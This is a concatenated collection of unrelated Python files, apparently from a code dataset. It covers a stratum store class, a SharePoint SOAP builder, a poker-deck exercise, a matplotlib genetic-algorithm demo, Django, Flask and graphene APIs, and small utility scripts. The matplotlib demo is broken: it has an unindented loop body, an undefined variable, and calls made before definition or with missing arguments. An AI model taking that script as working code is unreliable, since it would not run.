    ) -> int:
        """Map from deposition generation to column position.

        What is the deposition rank of the stratum positioned at index i
        among retained strata? Index order is from most ancient (index 0) to
        most recent.
        """
        res_rank = self.GetStratumAtColumnIndex(index).GetDepositionRank()
        # this store assumes strata record their deposition rank
        assert res_rank is not None
        return res_rank

    def GetColumnIndexOfRank(
        self: "HereditaryStratumOrderedStoreList",
        rank: int,
    ) -> typing.Optional[int]:
        """Map from column position to deposition generation

        What is the index position within retained strata of the stratum
        deposited at rank r? Returns None if no stratum with rank r is present
        within the store.
        """
        if self.GetNumStrataRetained() == 0:
            return None
        else:
            # ranks are stored in ascending order, so binary search for the
            # first index whose rank is >= the target rank
            res_idx = binary_search(
                lambda idx: self.GetRankAtColumnIndex(idx) >= rank,
                0,
                self.GetNumStrataRetained() - 1,
            )
            if res_idx is None:
                return None
            elif self.GetRankAtColumnIndex(res_idx) == rank:
                return res_idx
            else:
                # nearest retained rank overshoots: rank r was deleted
                return None

    def DelRanks(
        self: "HereditaryStratumOrderedStoreList",
        ranks: typing.Iterator[int],
        # deposition ranks might not be stored in strata
        get_column_index_of_rank: typing.Optional[typing.Callable] = None,
    ) -> None:
        """Purge strata with specified deposition ranks from the store.

        Parameters
        ----------
        ranks : iterator over int
            The ranks to be deleted.
        get_column_index_of_rank : callable, optional
            Callable that returns the index position within retained strata
            of the stratum deposited at rank r.
        """
        if get_column_index_of_rank is None:
            get_column_index_of_rank = self.GetColumnIndexOfRank
        indices = [get_column_index_of_rank(rank) for rank in ranks]
        # adapted from https://stackoverflow.com/a/11303234/17332200
        # iterate over indices in reverse order to prevent invalidation
        # reversed() is a potential optimization
        # given indices is assumed to be in ascending order
        for index in sorted(reversed(indices), reverse=True):
            assert index is not None
            del self._data[index]

    def IterRetainedRanks(
        self: "HereditaryStratumOrderedStoreList",
    ) -> typing.Iterator[int]:
        """Iterate over deposition ranks of strata present in the store from
        most ancient to most recent.

        The store may be altered during iteration without iterator
        invalidation, although subsequent updates will not be reflected in the
        iterator.
        """
        # must make copy to prevent invalidation when strata are deleted
        # note, however, that copy is made lazily
        # (only when first item requested)
        ranks = [stratum.GetDepositionRank() for stratum in self._data]
        for rank in ranks:
            assert rank is not None
            yield rank

    def IterRetainedStrata(
        self: "HereditaryStratumOrderedStoreList",
    ) -> typing.Iterator[HereditaryStratum]:
        """Iterate over stored strata from most ancient to most recent."""
        yield from self._data

    def IterRankDifferentiaZip(
        self: "HereditaryStratumOrderedStoreList",
        # deposition ranks might not be stored in strata
        get_rank_at_column_index: typing.Optional[typing.Callable] = None,
        start_column_index: int = 0,
    ) -> typing.Iterator[typing.Tuple[int, int]]:
        """Iterate over differentia and corresponding deposition ranks.

        Values yielded as tuples. Guaranteed ordered from most ancient to most
        recent.

        Parameters
        ----------
        get_rank_at_column_index : callable, optional
            Callable that returns the deposition rank of the stratum positioned
            at index i among retained strata.
        start_column_index : int, optional
            Number of strata to skip over before yielding first result from the
            iterator. Default 0, meaning no strata are skipped over.
        """
        if get_rank_at_column_index is None:
            get_rank_at_column_index = self.GetRankAtColumnIndex
        # adapted from https://stackoverflow.com/a/12911454
        for index in range(start_column_index, len(self._data)):
            stratum = self._data[index]
            yield (get_rank_at_column_index(index), stratum.GetDifferentia())

    def Clone(
        self: "HereditaryStratumOrderedStoreList",
    ) -> "HereditaryStratumOrderedStoreList":
        """Create an independent copy of the store.

        Returned copy contains identical data but may be freely altered without
        affecting data within this store.
        """
        # shallow copy
        result = copy(self)
        # do semi-shallow clone on select elements
        # see https://stackoverflow.com/a/47859483 for performance considerations
        result._data = [*self._data]
        return result
|
996,682 | 1f8d9bcc154ad2e4d0a0929fefca509f781a7e01 | from typing import Dict
from typing import List
from typing import Optional
from lxml import etree
# TODO: Port to defusedxml to satisfy Bandit
# import defusedxml.ElementTree as etree
class Soap:
    """A simple class for building SOAP Requests"""

    def __init__(self, command):  # type: (str) -> None
        """Create an envelope for the named SharePoint SOAP method.

        Args:
            command: Name of the SOAP method (e.g. "UpdateListItems").
        """
        self.envelope = None
        self.command = command
        self.request = None
        self.updates = None
        self.batch = None
        # HEADER GLOBALS
        SOAPENV_NAMESPACE = "http://schemas.xmlsoap.org/soap/envelope/"
        SOAPENV = "{%s}" % SOAPENV_NAMESPACE
        ns0_NAMESPACE = "http://schemas.xmlsoap.org/soap/envelope/"
        ns1_NAMESPACE = "http://schemas.microsoft.com/sharepoint/soap/"
        xsi_NAMESPACE = "http://www.w3.org/2001/XMLSchema-instance"
        NSMAP = {"SOAP-ENV": SOAPENV_NAMESPACE, "ns0": ns0_NAMESPACE, "ns1": ns1_NAMESPACE, "xsi": xsi_NAMESPACE}
        # Create Header
        self.envelope = etree.Element(SOAPENV + "Envelope", nsmap=NSMAP)
        HEADER = etree.SubElement(self.envelope, "{http://schemas.xmlsoap.org/soap/envelope/}Body")
        # Create Command (note: this replaces the command *name* stored above
        # with the command XML element, preserving the original behavior)
        self.command = etree.SubElement(HEADER, "{http://schemas.microsoft.com/sharepoint/soap/}" + command)
        self.start_str = b"""<?xml version="1.0" encoding="utf-8"?>"""

    def add_parameter(self, parameter, value=None):
        # type: (str, Optional[str]) -> None
        """Append a simple <parameter>value</parameter> child to the command.

        NOTE(review): falsy values ('' / 0) leave the element empty -- confirm
        this is intended rather than an explicit ``is not None`` check.
        """
        sub = etree.SubElement(self.command, "{http://schemas.microsoft.com/sharepoint/soap/}" + parameter)
        if value:
            sub.text = value

    # UpdateListItems Method
    def add_actions(self, data, kind):
        # type: (List[Dict[str, str]], str) -> None
        """Add a Batch of Method actions (e.g. "New", "Update", "Delete").

        May be called multiple times; all actions accumulate within a single
        <updates>/<Batch> element.
        """
        if not self.updates:
            # BUG FIX: the original assigned a *local* ``updates`` variable,
            # so self.updates stayed None and every call created a fresh
            # <updates>/<Batch> pair instead of appending to the first one.
            self.updates = etree.SubElement(self.command, "{http://schemas.microsoft.com/sharepoint/soap/}updates")
            self.batch = etree.SubElement(self.updates, "Batch")
            self.batch.set("OnError", "Return")
            self.batch.set("ListVersion", "1")
        if kind == "Delete":
            # deletes only carry the item ID
            for index, _id in enumerate(data, 1):
                method = etree.SubElement(self.batch, "Method")
                method.set("ID", str(index))
                method.set("Cmd", kind)
                field = etree.SubElement(method, "Field")
                field.set("Name", "ID")
                field.text = str(_id)
        else:
            # creates/updates carry one Field element per column
            for index, row in enumerate(data, 1):
                method = etree.SubElement(self.batch, "Method")
                method.set("ID", str(index))
                method.set("Cmd", kind)
                for key, value in row.items():
                    field = etree.SubElement(method, "Field")
                    field.set("Name", key)
                    field.text = str(value)

    # GetListFields Method
    def add_view_fields(self, fields):
        # type: (List[str]) -> None
        """Restrict the request to the named view fields."""
        viewFields = etree.SubElement(self.command, "{http://schemas.microsoft.com/sharepoint/soap/}viewFields")
        viewFields.set("ViewFieldsOnly", "true")
        ViewFields = etree.SubElement(viewFields, "ViewFields")
        for field in fields:
            view_field = etree.SubElement(ViewFields, "FieldRef")
            view_field.set("Name", field)

    # GetListItems Method
    def add_query(self, pyquery):
        # type: (Dict) -> None
        """Build a CAML <Query> from a dict with optional OrderBy/GroupBy/Where.

        OrderBy entries may be plain field names or (name, "DESCENDING")
        tuples; a Where clause is expected as a pre-built XML element.
        """
        query = etree.SubElement(self.command, "{http://schemas.microsoft.com/sharepoint/soap/}query")
        Query = etree.SubElement(query, "Query")
        if "OrderBy" in pyquery:
            order = etree.SubElement(Query, "OrderBy")
            for field in pyquery["OrderBy"]:
                fieldref = etree.SubElement(order, "FieldRef")
                # isinstance instead of "type(...) == tuple" (idiomatic and
                # tolerant of tuple subclasses such as namedtuples)
                if isinstance(field, tuple):
                    fieldref.set("Name", field[0])
                    if field[1] == "DESCENDING":
                        fieldref.set("Ascending", "FALSE")
                else:
                    fieldref.set("Name", field)
        if "GroupBy" in pyquery:
            order = etree.SubElement(Query, "GroupBy")
            for field in pyquery["GroupBy"]:
                fieldref = etree.SubElement(order, "FieldRef")
                fieldref.set("Name", field)
        if "Where" in pyquery:
            Query.append(pyquery["Where"])

    def __repr__(self):  # type: () -> str
        """Compact (non-pretty) serialization of the full envelope."""
        return (self.start_str + etree.tostring(self.envelope)).decode("utf-8")

    def __str__(self, pretty_print=True):  # type: (bool) -> str
        """Serialization of the full envelope, pretty-printed by default.

        BUG FIX: pretty_print was accepted but ignored (hardcoded True); it is
        now honored, with default True so plain str(obj) output is unchanged.
        """
        return (self.start_str + etree.tostring(self.envelope, pretty_print=pretty_print)).decode("utf-8")
|
996,683 | b690fedb671164352d84ba72fb894315bbd11f54 | """
La funcion "crear_mazo_cartas_poker" esta incompleta y necesita ser completada para
devolver una lista de diccionarios con todas las cartas disponibles en un mazo de poker.
Nota: El ejercicio 041* ya muestra una función similar que puede usarse como ayuda
* https://github.com/avdata99/programacion-para-no-programadores/blob/master/ejercicios/ejercicio-041/ejercicio.py
"""
def crear_mazo_cartas_poker():
    """Return the complete 52-card poker deck as a list of dicts.

    Each card has the form {'numero': X, 'palo': Y}, with numbers 2-10 plus
    the figures 'J', 'Q', 'K', 'A' for each of the four suits. This completes
    the exercise stub so that the assertions at the bottom of the file pass.
    """
    palos = ['pica', 'trebol', 'corazon', 'diamante']
    numeros = list(range(2, 11)) + ['J', 'Q', 'K', 'A']
    mazo = [
        {'numero': numero, 'palo': palo}
        for palo in palos
        for numero in numeros
    ]
    return mazo
# ------------------------------------------------------------------------
# DO NOT DELETE OR MODIFY THE LINES THAT FOLLOW
# ------------------------------------------------------------------------
# Once the task is finished, run this file.
# If the message 'Ejercicio terminado OK' is shown, the exercise is complete.
# Python's "assert" statement raises an error if the condition that
# follows is false.
# If you use GitHub (or similar) you can create a new branch with this
# solution, open a "pull request" and request review from a third party.
mazo_poker = crear_mazo_cartas_poker()
assert {'numero': 9, 'palo': 'pica'} in mazo_poker
assert {'numero': 10, 'palo': 'pica'} in mazo_poker
assert {'numero': 'J', 'palo': 'pica'} in mazo_poker
assert {'numero': 'Q', 'palo': 'pica'} in mazo_poker
assert {'numero': 'K', 'palo': 'pica'} in mazo_poker
assert {'numero': 9, 'palo': 'diamante'} in mazo_poker
assert {'numero': 10, 'palo': 'diamante'} in mazo_poker
assert {'numero': 'J', 'palo': 'diamante'} in mazo_poker
assert {'numero': 'Q', 'palo': 'diamante'} in mazo_poker
assert {'numero': 'K', 'palo': 'diamante'} in mazo_poker
print('Ejercicio terminado OK')
|
996,684 | 1a0e318d77c4c5189826dc5ee94ddc6e88fce3cd | from .csv2WKT import Crs2WKT |
996,685 | 1f7c3d10759b1ce5c317e221fb5c5fcc56c57b30 | import matplotlib.pyplot as plt
import numpy as np
import pandas
from matplotlib.table import Table
#the_table.auto_set_font_size(False)
#the_table.set_fontsize(5.5)
npop = 8
nc = 12
grid = [[0 for x in range(nc)] for y in range(npop)]
def randomgen(high, n):
    """Return a list of n random ints drawn uniformly from [0, high)."""
    return list(np.random.randint(high, size=n))
# NOTE(review): this whole section reads like a pasted REPL transcript --
# bare-expression lines ("a", "grid", "ind", ...) only echo values in an
# interactive session and are no-ops as a script.
a = randomgen(6, nc)
a
# fill each individual's chromosome with random gene values 0-5
for i in range (npop):
    grid[i] = randomgen(6,nc)
grid
s = 'individual'
ind = range(1,9)
ind
indname = ["individual" + ' ' + str(i) for i in ind]
indname
data = pandas.DataFrame(grid)
# NOTE(review): index.name expects a hashable scalar; assigning the indname
# *list* here likely fails or misbehaves -- confirm intent (set_axis?).
data.index.name = indname
data
# NOTE(review): checkerboard_table is called here *before* any of its
# definitions below -- as a script this raises NameError.
checkerboard_table(data)
plt.show()
def main():
    """Render the full population grid as a table figure.

    Relies on the module-level globals ``grid``, ``nc`` and ``npop`` and on
    whichever ``checkerboard_table`` definition is currently bound.
    """
    data = pandas.DataFrame(grid,
                            columns=['1','2','3','4','5','6','7','8','9','10','11','12'])
    checkerboard_table(data,nc,npop)
def checkerboard_table(data,nc,npop, fmt='{:.0f}', bkg_colors=['white', 'white']):
    """Draw *data* as a matplotlib Table and save the figure to "pop1.pdf".

    Rows are labelled "individual <n>", columns take the DataFrame column
    labels. Returns the created figure.

    NOTE(review): bkg_colors is a mutable default argument (shared across
    calls); harmless here since it is never mutated, but fragile.
    """
    fig, ax = plt.subplots(figsize=(nc*0.8,npop*0.8))
    ax.set_axis_off()
    ax.set_xlabel('Population')
    tb = Table(ax)
    tb.auto_set_font_size(False)
    tb.set_fontsize(14)
    nrows, ncols = data.shape
    width, height = 1.0 / ncols, 1.0 / nrows
    # Add cells
    for (i,j), val in np.ndenumerate(data):
        # Index either the first or second item of bkg_colors based on
        # a checker board pattern (both entries are white here, so no
        # visible highlighting in this variant)
        idx = 0 if val == 1 else 1
        color = bkg_colors[idx]
        tb.add_cell(i, j, width, height, text=fmt.format(val),
                    loc='center', facecolor=color)
    # Row Labels...
    for i, label in enumerate(data.index):
        tb.add_cell(i, -1, width, height, text="individual" + ' ' + str(label + 1), loc='right',
                    edgecolor='none', facecolor='none')
    # Column Labels...
    for j, label in enumerate(data.columns):
        tb.add_cell(-1, j, width, height/2, text=label, loc='center',
                    edgecolor='none', facecolor='none')
    ax.add_table(tb)
    plt.savefig("pop1.pdf",dpi=100)
    return fig
if __name__ == '__main__':
    main()
############
# Second variant: rebinds checkerboard_table with an extra ``indexname``
# row-label prefix, a larger figure, and yellow highlighting of cells == 1.
def checkerboard_table(data,nc,npop,indexname, fmt='{:.0f}', bkg_colors=['yellow', 'white']):
    """Draw *data* as a matplotlib Table; cells equal to 1 get a yellow
    background. Row labels read "<indexname> <n>". Returns the figure."""
    fig, ax = plt.subplots(figsize=(nc*1.5,npop*1.5))
    ax.set_axis_off()
    ax.set_xlabel('Population')
    tb = Table(ax)
    tb.auto_set_font_size(False)
    tb.set_fontsize(14)
    nrows, ncols = data.shape
    width, height = 1.0 / ncols, 1.0 / nrows
    # Add cells
    for (i,j), val in np.ndenumerate(data):
        # Index either the first or second item of bkg_colors based on
        # a checker board pattern
        idx = 0 if val ==1 else 1
        color = bkg_colors[idx]
        tb.add_cell(i, j, width, height, text=fmt.format(val),
                    loc='center', facecolor=color)
    # Row Labels...
    for i, label in enumerate(data.index):
        tb.add_cell(i, -1, width, height, text= indexname + ' ' + str(label + 1), loc='right',
                    edgecolor='none', facecolor='none')
    # Column Labels...
    for j, label in enumerate(data.columns):
        tb.add_cell(-1, j, width, height/2, text=label, loc='center',
                    edgecolor='none', facecolor='none')
    ax.add_table(tb)
    #plt.savefig("hk.pdf")
    return fig
# Manual single-point crossover / mutation demo on two selected individuals.
# (REPL transcript: bare-expression lines are interactive echoes, no-ops in
# a script.)
data = pandas.DataFrame(grid, columns=['1','2','3','4','5','6','7','8','9','10','11','12'])
dataselect = data.loc[[0,5], :]
dataselect
# NOTE(review): the v2 definition above requires ``indexname``; this call
# omits it and would raise TypeError when run top-to-bottom.
checkerboard_table(dataselect, nc = 12, npop=2)
plt.show()
dataselectcrossover = dataselect.copy()
dataselectcrossover
ind1 = dataselect.iloc[0,:]
ind2 = dataselect.iloc[1,:]
ind2
ind1
ind1[11]
crossind1 = np.copy(ind1)
crossind2 = np.copy(ind2)
crossind1
# single-point crossover at gene 6: swap the tails of the two parents
crossind1 [6:12] = np.copy(ind2[6:12])
crossind1
ind1
crossind2 [6:12] = np.copy(ind1[6:12])
crossind2
ind2
ind1
crossind1
crossind2
# NOTE(review): passing crossind2 as the DataFrame *index* argument is
# almost certainly unintended (result is unused).
datanew = pandas.DataFrame(crossind1,crossind2)
datanew
dataselectcrossover.iloc[0,:] = np.copy(crossind1)
dataselectcrossover.iloc[1,:] = np.copy(crossind2)
dataselectcrossover
dataselect
checkerboard_table(dataselectcrossover, nc = 12, npop=2, indexname = "Individual")
datamutate = dataselectcrossover.copy()
datamutate
# point mutation: set gene 10 of the first offspring to 0
datamutate.iloc[0, 10] = 0
datamutate
checkerboard_table(dataselect, nc = 12, npop=2, indexname = "Parent")
checkerboard_table(dataselectcrossover, nc = 12, npop=2, indexname = "Child")
# NOTE(review): ``fig`` is never assigned at module level -- NameError here.
fig.savefig("cross.pdf")
fig.show()
checkerboard_table(dataselect, nc = 12, npop=2,indexname = "Parent")
checkerboard_table(dataselectcrossover, nc = 12, npop=2, indexname = "Child")
checkerboard_table(datamutate, nc = 12, npop=2, indexname = "Child")
dataselectcrossover
# Third variant: like v2 but all-white backgrounds, larger font, and row
# labels numbered by *position* (str(i+1)) instead of by DataFrame index.
def checkerboard_table(data,nc,npop, indexname, fmt='{:.0f}', bkg_colors=['white', 'white']):
    """Draw *data* as a matplotlib Table with "<indexname> <n>" row labels.
    Returns the figure (no highlighting in this variant)."""
    fig, ax = plt.subplots(figsize=(nc*1.5,npop*1.5))
    ax.set_axis_off()
    ax.set_xlabel('Population')
    tb = Table(ax)
    tb.auto_set_font_size(False)
    tb.set_fontsize(20)
    nrows, ncols = data.shape
    width, height = 1.0 / ncols, 1.0 / nrows
    # Add cells
    for (i,j), val in np.ndenumerate(data):
        # Index either the first or second item of bkg_colors based on
        # a checker board pattern
        idx = 0 if val == 1 else 1
        color = bkg_colors[idx]
        tb.add_cell(i, j, width, height, text=fmt.format(val),
                    loc='center', facecolor=color)
    # Row Labels...
    for i, label in enumerate(data.index):
        tb.add_cell(i, -1, width, height, text= indexname + ' ' + str(i+1), loc='right',
                    edgecolor='none', facecolor='none')
    # Column Labels...
    for j, label in enumerate(data.columns):
        tb.add_cell(-1, j, width, height/2, text=label, loc='center',
                    edgecolor='none', facecolor='none')
    ax.add_table(tb)
    #plt.savefig("hk.pdf")
    return fig
checkerboard_table(data= dataselect,nc = 12, npop = 2, indexname = 'Individual')
plt.savefig("parent1.png")
checkerboard_table(data= dataselectcrossover,nc = 12, npop = 2, indexname = 'Offspring')
plt.savefig("crossover.png")
checkerboard_table(data= datamutate,nc = 12, npop = 2, indexname = 'Offspring')
plt.savefig("mutate.png")
plt.show()
def generategraph(file, idx):
    """Save the current matplotlib figure as '<file><idx>.png', then show it."""
    target = '{}{}.png'.format(file, idx)  # file might need to be replaced by a string
    plt.savefig(target)
    plt.show()  # must come after plt.savefig(), which needs the live figure
for idx, fil in enumerate(files):
generategraph(fil, idx)
###########3
# Compose the previously saved PNGs (population, crossover, mutation)
# into combined summary figures.
import matplotlib.image as mpimg
img=mpimg.imread('popcopy.png')
img1=mpimg.imread('crossover.png')
img2=mpimg.imread('mutate.png')
imgplot = plt.imshow(img)
plt.show()
# 2x2 grid: population spans the left column; crossover/mutation stack on the right.
fig3 = plt.figure(constrained_layout=True)
gs = fig3.add_gridspec(2, 2)
f3_ax1 = fig3.add_subplot(gs[:, 0])
f3_ax1.set_title('population')
f3_ax1.set_axis_off()
f3_ax2 = fig3.add_subplot(gs[0, 1])
f3_ax2.set_title('crossover')
f3_ax1.set_axis_off()
f3_ax3 = fig3.add_subplot(gs[1, 1])
f3_ax3.set_title('mutation')
f3_ax1.set_axis_off()
f3_ax2.set_axis_off()
f3_ax3.set_axis_off()
f3_ax1.imshow(img)
f3_ax2.imshow(img1)
f3_ax3.imshow(img2)
plt.savefig("all.png", dpi = 700)
plt.show()
# Two subplots, the axes array is 1-d
f, axarr = plt.subplots(2, sharex=True)
axarr[0].imshow(img1)
axarr[0].set_title('crossover')
axarr[1].imshow(img2)
axarr[1].set_title('mutation')
axarr[0].set_axis_off()
axarr[1].set_axis_off()
plt.savefig("offspring.png", dpi = 800)
plt.show()
img3=mpimg.imread('offspring.png')
#########
# Population next to the combined offspring image.
f, (ax1, ax2) = plt.subplots(1, 2, sharey=True)
ax1.imshow(img)
ax2.imshow(img3)
ax1.set_axis_off()
ax2.set_axis_off()
plt.savefig("combo.png", dpi = 800)
plt.show()
# Two subplots, the axes array is 1-d
# NOTE(review): this overwrites the combo.png saved just above.
f, axarr = plt.subplots(3, sharex=True)
axarr[0].imshow(img)
axarr[1].imshow(img1)
axarr[1].set_title('crossover')
axarr[2].imshow(img2)
axarr[2].set_title('mutation')
axarr[0].set_axis_off()
axarr[1].set_axis_off()
axarr[2].set_axis_off()
plt.savefig("combo.png", dpi = 800)
plt.show()
996,686 | a392264a15162dec84182f5d31137642fe51be1f | # -*- coding: utf-8 -*-
from django.http import Http404
from rest_framework.views import APIView
from rest_framework import status, permissions
from rest_framework.response import Response
from api import serializers
from api.permissions import IsAuthorOrReadOnly
from lbs2 import models
# List of orders
class VehicleList(APIView):
    """List the vehicles belonging to the authenticated user."""
    permission_classes = (permissions.IsAuthenticated, )

    def get(self, request):
        # NOTE(review): `object_set` is the reverse relation from the user
        # to models.Object — confirm the related_name, since VehicleDetail
        # queries models.Object directly.
        queryset = request.user.object_set.all()
        serializer = serializers.VehicleSerializer(queryset, many=True, context={'request': request})
        return Response(serializer.data)
# Order detail
class VehicleDetail(APIView):
    """Retrieve or update a single vehicle (models.Object)."""
    permission_classes = (permissions.IsAuthenticated, IsAuthorOrReadOnly, )

    def get_object(self, pk):
        # Map a missing row to HTTP 404 instead of a 500.
        try:
            return models.Object.objects.get(pk=pk)
        except models.Object.DoesNotExist:
            raise Http404

    def get(self, request, pk, format=None):
        order = self.get_object(pk)
        # NOTE(review): unlike VehicleList, no context={'request': ...} is
        # passed here — hyperlinked serializer fields would break; confirm.
        serializer = serializers.VehicleSerializer(order)
        return Response(serializer.data)

    def put(self, request, pk, format=None):
        # Full update via the detail serializer; returns 400 with field
        # errors when validation fails.
        vehicle = self.get_object(pk)
        serializer = serializers.VehicleDetailSerializer(vehicle, data=request.data)
        if serializer.is_valid():
            serializer.save()
            return Response(serializer.data)
        return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
# List of settings
class SettingsList(APIView):
    """Return the singleton settings record (row with id=1)."""
    permission_classes = (permissions.IsAuthenticated, )

    def get(self, request):
        # Bug fix: a bare .get(id=1) raised an uncaught DoesNotExist
        # (HTTP 500) when the row is absent; answer 404 instead.
        try:
            settings = models.Setting.objects.get(id=1)
        except models.Setting.DoesNotExist:
            raise Http404
        serializer = serializers.SettingsSerializer(settings)
        return Response(serializer.data)
|
996,687 | e16aa22ab171280b0086f8097f8cd08270500ce5 | from random import randint, seed
from time import time
seed(time())
# Python 2 script: emits one random weighted-graph test case per test.
tst = input()
print tst
for t in range(tst):
    # Fixed sizes: 100 nodes, 5000 edges, 5000 queries.
    n, m, k = 100, 5000, 5000
    print n, m, k
    # First 99 edges form the path 1-2-...-100 so the graph is connected.
    for u in range(2, 101):
        print u-1, u, randint(1, 1000)
    # Remaining m-99 edges are random forward edges (u < v).
    for i in range(99, m):
        u = randint(1, n-1)
        v, w = randint(u+1, n), randint(1, 1000)
        print u, v, w
    # k random query pairs.
    for i in range(k):
        print randint(1, n), randint(1, n)
996,688 | 0ecaab3f4514c2d32e03f3fc14daa46cb48883a8 | from facundo import nombre
# Demo: invoke mostrarNombre() from the local `facundo` package.
nombre.mostrarNombre()
996,689 | cb8c3524c7a5e1bf96e17f91df9017e012808fdd | import sys,urllib.request,re,os
if len(sys.argv)!=2:
    print("Specify an N3 block identifier")
    sys.exit()
dataset=sys.argv[1]
# Fetch the listing page for the dataset: an HTML table whose rows pair a
# pyramid id with a file name.
with urllib.request.urlopen("http://cmbn-navigator.uio.no/navigator/feeder/all_pyramids/?id="+dataset) as http:
    page=http.read().decode("utf-8")
trs=page.split("</tr>")
if len(trs)==1:
    # No table rows: the server answered with an error page instead.
    print("Some error happened,see N3 message below:")
    print()
    print(re.match(".*<body>(.*)</body>",page.replace("\r","").replace("\n",""),re.MULTILINE).groups()[0])
    sys.exit()
folder="downloads/"+dataset
os.makedirs(folder,exist_ok=True)
os.chdir(folder)
# Skip the header row (trs[0]) and the trailing fragment after the last row.
for row in (re.sub("\\s+","",tr) for tr in trs[1:-1]):
    # pair = (pyramid id, file name)
    pair=re.match("<tr><td>([^<]+)</td><td>([^<]+)",row).groups()
    print(pair)
    with open(pair[1]+".zip","wb") as f:
        with urllib.request.urlopen("http://cmbn-navigator.uio.no/navigator/feeder/pyramid/?id="+pair[0]) as http:
            # Stream in 64 MiB chunks to keep memory bounded.
            while True:
                chunk=http.read(64*1024*1024)
                if not chunk:
                    break
                f.write(chunk)
996,690 | 4c1790b8aea07197717f33a5e9396ef6f2215cf9 | import config
class Cell(object):
    """One cell of the puzzle grid: its position, committed value(s) and
    the candidate values that remain possible."""

    def __init__(self, pos=-1, value=0, is_starter=False):
        # A value of 0 means "unsolved": no committed values yet.
        self.values = [] if value == 0 else [value]
        self.locked = []
        self.pos = pos
        self.is_starter = is_starter
        # Every legal value starts out as a candidate.
        self.candidates = config.PUZZLE_DEF['VALUES'].copy()

    def get_cell_name(self):
        """Return the human-readable name: row letter + column label."""
        n_cols = config.PUZZLE_DEF['NO_COLS']
        row_name = config.PUZZLE_DEF['ROW_NAMES'][self.pos // n_cols]
        col_name = config.PUZZLE_DEF['COL_NAMES'][self.pos % n_cols]
        return row_name + col_name

    def get_num_candidates(self):
        """Number of values still possible for this cell."""
        return len(self.candidates)

    def get_candidates(self):
        """The list of values still possible for this cell."""
        return self.candidates

    def remove_candidate(self, value):
        """Drop *value* from the candidates (ValueError if absent)."""
        self.candidates.remove(value)

    def is_solved(self):
        """True once exactly one value is committed."""
        return len(self.values) == 1

    def get_value(self):
        """The committed value, or 0 while the cell is unsolved."""
        return self.values[0] if self.is_solved() else 0

    def set_value(self, value):
        """Commit a single value."""
        self.values = [value]

    def set_values(self, values):
        """Replace the committed values with a copy of *values*."""
        self.values = values.copy()
996,691 | 715a408e972dcd26ce4643dcd99264b0753052a7 | import decimal
import graphene
from graphene import relay
from . import models
from graphene.types.scalars import Scalar
from graphql.language import ast
class Decimal(Scalar):
    """
    The `Decimal` scalar type represents a python Decimal.

    Serialized as a string so clients never lose precision to floats.
    """

    @staticmethod
    def serialize(dec):
        # Accept either a Decimal or its string form; always emit a string.
        if isinstance(dec, str):
            dec = decimal.Decimal(dec)
        assert isinstance(dec, decimal.Decimal), (
            'Received not compatible Decimal "{}"'.format(repr(dec)))
        return str(dec)

    @classmethod
    def parse_literal(cls, node):
        # Only string literals are accepted; anything else yields None.
        if isinstance(node, ast.StringValue):
            return cls.parse_value(node.value)

    @staticmethod
    def parse_value(value):
        try:
            return decimal.Decimal(value)
        except (decimal.InvalidOperation, ValueError, TypeError):
            # Bug fix: decimal.Decimal raises InvalidOperation (not
            # ValueError) on malformed strings, and TypeError on
            # non-numeric types; the original `except ValueError`
            # let both escape.
            return None
class ProductInfo(graphene.ObjectType):
    """GraphQL node exposing one ProductInfo row (title/description/price)."""
    class Meta:
        interfaces = (relay.Node, )
    title = graphene.String()
    description = graphene.String()
    price = Decimal()  # custom scalar: serialized as a string for precision
    @classmethod
    def get_node(self, info, id):
        # Relay global-id resolution -> SQLAlchemy primary-key lookup.
        return models.ProductInfo.query.get(id)
class ProductInfoConnection(graphene.Connection):
    """Relay connection (edges/pageInfo) over ProductInfo nodes."""
    class Meta:
        node = ProductInfo
class Product(graphene.ObjectType):
    """GraphQL node for a Product plus a connection to its info rows."""
    class Meta:
        interfaces = (relay.Node, )
    name = graphene.String()
    info = graphene.ConnectionField(ProductInfoConnection)
    def resolve_info(self, info):
        # All ProductInfo rows whose `product` relation is this instance.
        return list(models.ProductInfo.query.filter(
            models.ProductInfo.product == self))
    @classmethod
    def get_node(self, info, id):
        return models.Product.query.get(id)
class ProductConnection(graphene.Connection):
    """Relay connection over Product nodes."""
    class Meta:
        node = Product
class Query(graphene.ObjectType):
    """Root query: relay node lookup plus a paginated products list."""
    node = relay.Node.Field()
    products = graphene.ConnectionField(ProductConnection)
    def resolve_products(self, info):
        return models.Product.query.all()
# Schema entry point; Product is listed explicitly so relay can resolve it.
schema = graphene.Schema(query=Query, types=[Product])
996,692 | 00b19797edae9351e07910bda41759cbd77b1f85 | #!/usr/bin/env python3
# -*- conding:utf8 -*-
from flask import abort
from flask_restful import Resource, fields, marshal_with, reqparse, inputs
from app.api import api, meta_fields
from app.extensions import auth
from app.models.category import Category as CategoryModel
from app.lib.errors import success, execute_success
from app.lib.decorators import paginate, api_permission_control
# Request-field filtering: only `name` is accepted from the request body.
category_parser = reqparse.RequestParser()
category_parser.add_argument('name', type=str)
# args = category_parser.parse_args()  # parse the arguments
# Output marshalling formats: a single category, and a paginated
# collection (items + paging metadata).
category_fields = {
    'id': fields.Integer,
    'name':fields.String,
}
category_collection_fields = {
    'items': fields.List(fields.Nested(category_fields)),
    'meta': fields.Nested(meta_fields),
}
class CategoryApi(Resource):
    """CRUD endpoints for a single Category (/category and /category/<id>)."""
    # Write operations require login plus the API permission check;
    # GET is intentionally left open.
    method_decorators = {
        'delete': [api_permission_control(), auth.login_required],
        'post': [api_permission_control(), auth.login_required],
        'put': [api_permission_control(), auth.login_required],
    }

    @marshal_with(category_fields)
    def get(self, id=None):
        """Return one category, or 404 when the id is unknown."""
        category = CategoryModel.query.filter_by(id=id).first()
        if not category:
            abort(404)
        return category

    def delete(self, id=None):
        """Delete one category, or 404 when the id is unknown."""
        category = CategoryModel.query.filter_by(id=id).first()
        if not category:
            abort(404)
        category.delete()
        return execute_success()

    def post(self):
        """Create a category from the parsed request args."""
        args = category_parser.parse_args()
        # category owns the task
        # NOTE(review): the created instance is never returned to the
        # client; confirm whether the API should echo the new resource.
        category = CategoryModel.create(**args)
        return success()

    def put(self, id=0, **kwargs):
        """Update one category in place, or 404 when the id is unknown."""
        category = CategoryModel.query.filter_by(id=id).first()
        if not category:
            abort(404)
        category.update(**category_parser.parse_args())
        return execute_success()
class CategoryCollectionApi(Resource):
    """Paginated listing of all categories (/categorys)."""
    @marshal_with(category_collection_fields)
    @paginate(10)  # 10 items per page; @paginate consumes the query object
    def get(self, category_id=None):
        categorys = CategoryModel.query
        return categorys
# Route registration for both resources.
